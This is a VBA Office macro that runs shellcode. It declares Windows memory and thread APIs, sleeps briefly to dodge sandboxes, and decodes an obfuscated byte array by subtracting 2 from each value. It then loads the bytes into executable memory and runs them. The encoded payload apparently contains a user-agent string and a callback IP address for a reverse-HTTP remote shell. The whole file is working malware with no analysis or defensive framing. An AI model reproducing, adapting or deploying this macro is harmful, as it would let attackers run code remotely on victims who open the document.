```
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function mymacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    Dim t1 As Date
    Dim t2 As Date
    Dim time As Long
    
    t1 = Now()
    Sleep (2000)
    t2 = Now()
    time = DateDiff("s", t1, t2)
    If time < 2 Then
        Exit Function
    End If

    
    

    
    buf = Array(254, 234, 145, 2, 2, 2, 98, 139, 231, 51, 212, 102, 141, 84, 50, 141, 84, 14, 141, 84, 22, 17, 185, 76, 40, 51, 1, 141, 116, 42, 51, 194, 174, 62, 99, 126, 4, 46, 34, 195, 209, 15, 3, 201, 75, 119, 241, 84, 141, 84, _
18, 141, 68, 62, 3, 210, 141, 66, 122, 89, 135, 194, 118, 78, 3, 210, 141, 90, 34, 82, 141, 74, 26, 3, 213, 135, 203, 118, 62, 51, 1, 75, 141, 54, 141, 3, 216, 51, 194, 195, 209, 15, 174, 3, 201, 58, 226, 119, 246, 5, _
127, 250, 61, 127, 38, 119, 226, 90, 141, 90, 38, 3, 213, 104, 141, 14, 77, 141, 90, 30, 3, 213, 141, 6, 141, 3, 210, 139, 70, 38, 38, 93, 93, 99, 91, 92, 83, 1, 226, 90, 97, 92, 141, 20, 235, 130, 1, 1, 1, 95, _
106, 112, 103, 118, 2, 106, 121, 107, 112, 107, 86, 106, 78, 121, 40, 9, 1, 215, 51, 221, 85, 85, 85, 85, 85, 234, 120, 2, 2, 2, 79, 113, 124, 107, 110, 110, 99, 49, 55, 48, 50, 34, 42, 79, 99, 101, 107, 112, 118, 113, _
117, 106, 61, 34, 75, 112, 118, 103, 110, 34, 79, 99, 101, 34, 81, 85, 34, 90, 34, 51, 50, 97, 51, 55, 97, 57, 43, 34, 67, 114, 114, 110, 103, 89, 103, 100, 77, 107, 118, 49, 55, 53, 57, 48, 53, 56, 34, 42, 77, 74, _
86, 79, 78, 46, 34, 110, 107, 109, 103, 34, 73, 103, 101, 109, 113, 43, 34, 69, 106, 116, 113, 111, 103, 49, 51, 52, 53, 48, 50, 48, 50, 48, 50, 34, 85, 99, 104, 99, 116, 107, 49, 55, 53, 57, 48, 53, 56, 2, 106, 60, _
88, 123, 169, 1, 215, 85, 85, 108, 5, 85, 85, 106, 189, 3, 2, 2, 234, 84, 3, 2, 2, 49, 100, 116, 105, 67, 69, 110, 74, 106, 91, 122, 119, 113, 76, 99, 109, 109, 124, 117, 68, 123, 81, 105, 68, 91, 77, 50, 54, 84, _
55, 116, 106, 84, 112, 85, 119, 100, 100, 67, 119, 56, 121, 85, 71, 50, 56, 47, 57, 97, 82, 122, 71, 74, 67, 51, 55, 117, 71, 108, 67, 105, 73, 69, 72, 83, 123, 47, 117, 109, 104, 52, 116, 104, 90, 120, 103, 50, 67, 89, _
85, 124, 91, 82, 124, 88, 122, 71, 78, 59, 102, 47, 84, 50, 76, 58, 83, 101, 90, 52, 119, 118, 54, 107, 100, 92, 91, 108, 84, 111, 87, 86, 91, 114, 116, 84, 100, 67, 56, 97, 69, 92, 74, 112, 117, 100, 91, 86, 57, 124, _
88, 105, 115, 79, 78, 120, 112, 116, 67, 55, 88, 123, 57, 91, 120, 120, 104, 67, 104, 50, 89, 122, 100, 81, 111, 59, 69, 122, 70, 86, 86, 78, 68, 71, 82, 119, 72, 74, 102, 115, 115, 118, 122, 108, 69, 81, 121, 77, 114, 55, _
105, 120, 54, 79, 108, 106, 92, 84, 79, 107, 124, 97, 80, 90, 55, 2, 82, 106, 89, 139, 161, 200, 1, 215, 139, 200, 85, 106, 2, 52, 234, 134, 85, 85, 85, 89, 85, 88, 106, 237, 87, 48, 61, 1, 215, 152, 108, 12, 97, 106, _
130, 53, 2, 2, 139, 226, 108, 6, 82, 108, 33, 88, 106, 119, 72, 160, 136, 1, 215, 85, 85, 85, 85, 88, 106, 47, 8, 26, 125, 1, 215, 135, 194, 119, 22, 106, 138, 21, 2, 2, 106, 70, 242, 55, 226, 1, 215, 81, 119, 207, _
234, 76, 2, 2, 2, 108, 66, 106, 2, 18, 2, 2, 106, 2, 2, 66, 2, 85, 106, 90, 166, 85, 231, 1, 215, 149, 85, 85, 139, 233, 89, 106, 2, 34, 2, 2, 85, 88, 106, 20, 152, 139, 228, 1, 215, 135, 194, 118, 209, 141, _
9, 3, 197, 135, 194, 119, 231, 90, 197, 97, 234, 109, 1, 1, 1, 51, 59, 52, 48, 51, 56, 58, 48, 51, 48, 52, 54, 54, 2, 189, 242, 183, 164, 88, 108, 2, 85, 1, 215)

    For i = 0 To UBound(buf)
        buf(i) = buf(i) - 2
    Next i
 

    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    res = CreateThread(0, 0, addr, 0, 0, 0)



End Function
```



